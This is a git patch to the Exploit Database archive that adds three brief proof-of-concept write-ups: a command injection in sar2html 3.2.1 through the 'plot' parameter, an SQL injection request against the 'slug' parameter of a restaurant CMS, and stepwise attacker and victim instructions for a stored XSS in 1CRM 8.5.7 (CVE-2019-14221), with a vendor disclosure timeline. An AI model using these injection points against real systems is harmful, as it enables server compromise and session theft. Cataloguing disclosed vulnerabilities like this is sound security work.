From 5cabe1e1de4df01005a14dc1d5d592b6acb5c678 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 3 Aug 2019 05:02:16 +0000 Subject: [PATCH] DB: 2019-08-03 3 changes to exploits/shellcodes Ultimate Loan Manager 2.0 - Cross-Site Scripting WebIncorp ERP - SQL injection Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery Ultimate Loan Manager 2.0 - Cross-Site Scripting WebIncorp ERP - SQL injection Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery Sar2HTML 3.2.1 - Remote Command Execution Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection 1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting --- exploits/php/webapps/47204.txt | 13 +++++ exploits/php/webapps/47205.txt | 18 +++++++ exploits/php/webapps/47206.txt | 99 ++++++++++++++++++++++++++++++++++ files_exploits.csv | 9 ++-- 4 files changed, 136 insertions(+), 3 deletions(-) create mode 100644 exploits/php/webapps/47204.txt create mode 100644 exploits/php/webapps/47205.txt create mode 100644 exploits/php/webapps/47206.txt diff --git a/exploits/php/webapps/47204.txt b/exploits/php/webapps/47204.txt new file mode 100644 index 000000000..994f956bd --- /dev/null +++ b/exploits/php/webapps/47204.txt @@ -0,0 +1,13 @@ +# Exploit Title: sar2html Remote Code Execution +# Date: 01/08/2019 +# Exploit Author: Furkan KAYAPINAR +# Vendor Homepage:https://github.com/cemtan/sar2html +# Software Link: https://sourceforge.net/projects/sar2html/ +# Version: 3.2.1 +# Tested on: Centos 7 + +In web application you will see index.php?plot url extension. + +http:///index.php?plot=; will execute +the command you entered. After command injection press "select # host" then your command's +output will appear bottom side of the scroll screen. \ No newline at end of file diff --git a/exploits/php/webapps/47205.txt b/exploits/php/webapps/47205.txt new file mode 100644 index 000000000..50fc2913c --- /dev/null +++ b/exploits/php/webapps/47205.txt @@ -0,0 +1,18 @@ +# Exploit Title: Rest - Cafe and Restaurant Website CMS - SQL Injection +# Date: 1.8.2019. +# Exploit Author: n1x_ [MS-WEB] +# Vendor Homepage: https://codecanyon.net/item/rest-cafe-and-restaurant-website-cms/21630154 +# CWE : CWE-89 + +Vulnerable parameter: slug (news.php) + +[GET Request] + +GET //host/[path]/news.php?slug=x' HTTP/1.1 +Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8 +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US +Cache-Control: max-age=0 +Cookie: PHPSESSID=87e839a144a7c326454406dea88b92bc +Host: host +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362 \ No newline at end of file diff --git a/exploits/php/webapps/47206.txt b/exploits/php/webapps/47206.txt new file mode 100644 index 000000000..ca5b17ee9 --- /dev/null +++ b/exploits/php/webapps/47206.txt @@ -0,0 +1,99 @@ +****************************************************************** +* 1CRM On-Premise Software 8.5.7 * +* Stored XSS * +****************************************************************** + + +//////////////////////////////////////////////////////////////////////////////////// + +# Exploit Title: 1CRM On-Premise Software 8.5.7 - Cross-Site Scripting +# Date: 19/07/2019 +# Exploit Author: Kusol Watchara-Apanukorn +# Vendor Homepage: https://1crm.com/ +# Version: 8.5.7 <= +# Tested on: CentOS 7.6.1810 (Core) +# CVE : CVE-2019-14221 +//////////////////////////////////////////////////////////////////////////////////// + + +////////////////////////////////////////////////////////////////////////////////////////////////////////////// + +1CRM On-Premise Software 8.5.7 allows XSS via a payload that is +mishandled during a Run Report operation. /// + +////////////////////////////////////////////////////////////////////////////////////////////////////////////// + + +Vulnerability Description: + +XSS flaws occur whenever an application includes untrusted data in a +new web page without proper validation or escaping, or updates an +existing web page with user supplied data using a browser API that can +create JavaScript. XSS allows attackers to execute scripts in the +victim’s browser which can hijack user sessions, deface web sites, or +redirect the user to malicious sites. + + +######################################################################################################################## +Attack Narratives and Scenarios: + # + + # +**Attacker** + # +1. Login as any user + # +2. Click Email icon + # +3. Click Report + # +4. Click Create Report + # +5. Fill Report Name (In our case we fill Company B) + # +6. Assign to Victim (In our case we assigned to admin) + # +7. Click Column Layout + # +8. Click Add empty column + # +9. Input malicious code (In our case: +) + # +10. Click Save + # + + # +**Victim** + # +1. Click email icon + # +2. Click Report + # +3. Choose report that we recently created (In our case we choose +Company B) # +4. Click Run Report + # +5. Admin cookie will popup + # +######################################################################################################################## + +PoC + +----------------------------------------- + +Github: https://github.com/cccaaasser/1CRM-CVE/blob/master/CVE-2019-14221.md + + +Vulnerability Disclosure Timeline: +================================== + +19 July, 19 : Found Vulnerability + +19 July, 19 : Vendor Notification + +24 July 19 : Vendor Response + +24 July 19 : Vendor Fixed + +31 July, 19 : Vendor released new patched version 8.5.10 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ea6578c73..c8dad72a4 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -41569,6 +41569,9 @@ id,file,description,date,author,type,platform,port 47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80 47188,exploits/hardware/webapps/47188.py,"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming",2019-07-30,"Jacob Baines",webapps,hardware, 47196,exploits/multiple/webapps/47196.txt,"Oracle Hyperion Planning 11.1.2.3 - XML External Entity",2019-07-31,"Lucas Dinucci",webapps,multiple, -47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple, -47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php, -47203,exploits/hardware/webapps/47203.html,"Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery",2019-08-01,"Alperen Soydan",webapps,hardware, +47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,80 +47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,80 +47203,exploits/hardware/webapps/47203.html,"Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery",2019-08-01,"Alperen Soydan",webapps,hardware,80 +47204,exploits/php/webapps/47204.txt,"Sar2HTML 3.2.1 - Remote Command Execution",2019-08-02,"Cemal Cihad ÇİFTÇİ",webapps,php,80 +47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80 +47206,exploits/php/webapps/47206.txt,"1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting",2019-08-02,"Kusol Watchara-Apanukorn",webapps,php,80